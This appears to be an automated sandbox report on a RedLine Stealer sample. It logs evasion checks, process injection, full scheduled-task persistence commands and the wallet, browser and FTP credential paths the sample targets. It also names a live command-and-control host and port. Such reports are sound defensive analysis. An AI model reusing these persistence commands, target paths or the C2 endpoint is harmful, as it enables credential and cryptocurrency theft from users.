Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\workalone.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\workalone.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\workalone.exe TID: 5856	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe TID: 5660	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\workalone.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\workalone.exe

Window / User API: threadDelayed 9525

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\workalone.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: workalone.exe, svchost.exe.7.dr	Binary or memory string: objectmethodInvokenhffskdsfkdddafrffddhfscffdfhkgfsfdfdfhddrfahddsshcfchfdgeffkdafsfddhdshdghfBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresulthfsdkfdhgfshsefdfafffdchfhhfgsffrffdkdfcdshhfdasdfhfcfhdgadfdfrsfsshdkfffghhjfdffhfgadsfcrddfffskhjfsfhrgddddffffkhsjdfjsdfcfddshdfgfedfkfghjsddddffsheghddjffffffgjskdgsfacsafpsfhjfkfhgfhjsrfhddfhffadsfsfhsscfgdbddfrjfsffhgdfafcfdssfkfhgjffchkffgahffsrddsfsfjjffadsfcfdggsdehfsgkffjjcfssadghfffrfddsdgkfffffchkfhrfdfdafgsssffjjffaffffdrdgfhcsdsgkffjjcfhdsfrfgfdsadfsdgkffffgdddfdsfdhfssfdghfhfssddssdfhfddfhhshsfddsdfsdfdshshsdsffdsdsdfsdfsfhsdhffsdssfsshddsfgfsafsdgfsdshsgsfsfdsdgssdaffadssgsfashdsfsgfssadfsdggasdsfdfshsggdsdfafaghssddfdafsadsfdsfsddsjdddfsdsfgdfgfsssdfhjfsdsafdfhgjffddddsgfdgsjsfsddfdfjdffafgdfddsfddjkfdssfdfsgfhfssjfsffdfgsjfadsffffdfhfsfsfsjsffsfdssdjdsdffffsskwssffssdvgsffffsdsgffssfddsxstartupInfoSkikgmgIdajdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdfshfsdhshhhgfdffffdfsfhsfdfsffhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType
Source: workalone.exe, svchost.exe.7.dr	Binary or memory string: hfsdkfdhgfshsefdfafffdch

Source: C:\Users\user\Desktop\workalone.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

Code function: 1_2_065EC798 LdrInitializeThunk,

1_2_065EC798

Source: C:\Users\user\Desktop\workalone.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\workalone.exe

Memory written: C:\Users\user\Desktop\workalone.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f	Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\workalone.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Source: workalone.exe, 00000001.00000003.372984422.0000000006925000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\workalone.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: #l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: #l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\workalone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\Desktop\workalone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: Yara match	File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	221 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	11 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	1 Access Token Manipulation	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Scheduled Task/Job	1 Disable or Modify Tools	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	22 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	231 Virtualization/Sandbox Evasion	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	111 Process Injection	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Obfuscated Files or Information	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Software Packing	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
workalone.exe	100%	Avira	HEUR/AGEN.1235903
workalone.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svchost\svchost.exe	100%	Avira	HEUR/AGEN.1235903
C:\Users\user\AppData\Roaming\svchost\svchost.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.workalone.exe.590000.0.unpack	100%	Avira	HEUR/AGEN.1235903		Download File
1.0.workalone.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943		Download File

Domains

Source	Detection	Scanner	Label	Link
api.ip.sb	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://ns.adobe.cobj	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/t_	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnviron	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://saleshor12.duckdns.org:46539	0%	Avira URL Cloud	safe
http://saleshor12.duckdns.org:46539/	0%	Avira URL Cloud	safe
saleshor12.duckdns.org:46539	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
http://saleshor12.duckdns.org	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
http://tempuri.org/0	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://saleshor12.duckdns.org:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
saleshor12.duckdns.org	85.208.136.178	true	true		unknown
api.ip.sb	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://saleshor12.duckdns.org:46539/	true	Avira URL Cloud: safe	unknown
saleshor12.duckdns.org:46539	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
https://duckduckgo.com/ac/?q=	tmp1B56.tmp.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
http://ns.adobe.cobj	workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
